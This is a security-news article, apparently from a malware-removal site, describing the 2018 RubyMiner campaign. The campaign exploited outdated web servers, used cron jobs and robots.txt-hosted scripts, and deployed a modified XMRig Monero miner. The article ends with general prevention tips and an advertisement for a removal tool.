What is Ruby Miner Virus?
As per the Check Point Researchers said the attack began on January 9-10 and within 24 hours 30% of networks worldwide experienced compromise attempts by the malware.
The malware uses web server fingerprinting tool called p0f to identify outdated windows and Linux web server. Security firm Certego also reported a huge spike in ruby HTTP exploiting since January 10th.
Top countries which were targeted include United States, Germany, United Kingdom, Norway, and Sweden. Researchers also found targeted attacks on servers like PHP, Microsoft IIS, and Ruby on Rails.
Once identified the attacker exploit multiple web server vulnerabilities to inject malicious codes into outdated systems.
“XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. Nevertheless, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit” said in the post published by Check Point.
Also read-How To Remove Unrans Ransomware From Computer Easily?
Attackers target both Linux and Windows servers
The RubyMiner group uses a web server fingerprinting tool named p0f to scan and identify Linux and Windows servers running outdated software. Once they have located unpatched servers, attackers deploy well-known exploits to gain a foothold on vulnerable servers and infect them with RubyMiner.
Attackers hide malicious code in robots.txt files
In a report published last week, Check Point has broken down RubyMiner's infection routine on Linux systems, based on data collected from their honeypot servers. There are some things that stand out right away, at least because of the attackers' creativity:
- The exploit code contains a series of shell commands
- Attackers clear all cron jobs
- Attackers add a new hourly cron job
- New cron job downloads a script hosted online
- This script is hosted inside the robots.txt file of various domains
- The script downloads and installs a modified version of the legitimate XMRig Monero miner application.
Check Point security researcher Lotem Finkelstein informed that they've seen attackers target windows IIS servers, but they have not been able to obtain a copy of the windows version of this malware just yet. This attack is difficult because one of the domains attackers used to hide malicious commands in the robots.txt file was also used in a previous malware campaign. That malware campaign also utilized the same Ruby on Rails exploit deployed in the Ruby Miner attacks, suggesting the same group that was behind those attacks is most likely now trying to spread Ruby Miner.
In the last week, 30% of networks worldwide experienced compromise attempts by a crypto-miner targeting web servers. During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool.
Among the top countries targeted are the United States, Germany, United Kingdom, Norway and Sweden, though no country has gone unscathed. With the growing popularity of virtual currency and its increasing value, the methods for mining these coins has grown as well. In 2017, usage of everyday websites for the mining of various cryptocurrencies became popular, with thousands of them being utilized for their CPU power. Having entered 2018, it seems that cyber author is again attempting to recruit any available machine for the sole purpose of self-profit.
Ruby Miner was seen as a minor annoyance has turned into a major wave of attack attempts across the globe, for it seems attackers are no longer satisfied with just personal computers and are now targeting powerful web servers to increase their computational resources.
Meanwhile the attacker chose to exploit multiple vulnerabilities in HTTP web servers, to distribute an open source Monero miner – XMRig. In fact, XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. Nevertheless, this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit.
Also read-What is Windrv.exe? How To Remove Windrv.exe Virus Easily?
Download Free Removal Tool
Tips to prevent RubyMiner Malware from entering your computer :
1. Enable your popup blocker: Pop-ups and ads in the websites are the most adoptable tactic used by cybercriminals or developers with the core intention to spread malicious programs. So, avoid clicking uncertain sites, software offers, pop-ups etc.
2. Keep your Windows Updated: To avoid such infections, we recommend that you should always keep your system updated through automatic windows update. By doing this you can keep your device free from virus. According to the survey, outdated/older versions of Windows operating system are an easy target.
3. Third-party installation: Try to avoid freeware download websites as they usually install bundled of software with any installer or stub file.
4. Regular Backup: Regular and periodical backup helps you to keep your data safe in case the system is infected by any kind of virus or any other infection. Thus always backup important files regularly on a cloud drive or an external hard drive.
5. Always have an Anti-Virus: Precaution is better than cure. We recommend that you install an antivirus like McAfee or a good Malware Removal Tool like Download Free Virus Removal Tool
6. Install a powerful ad- blocker for Chrome, Mozilla,and IE.
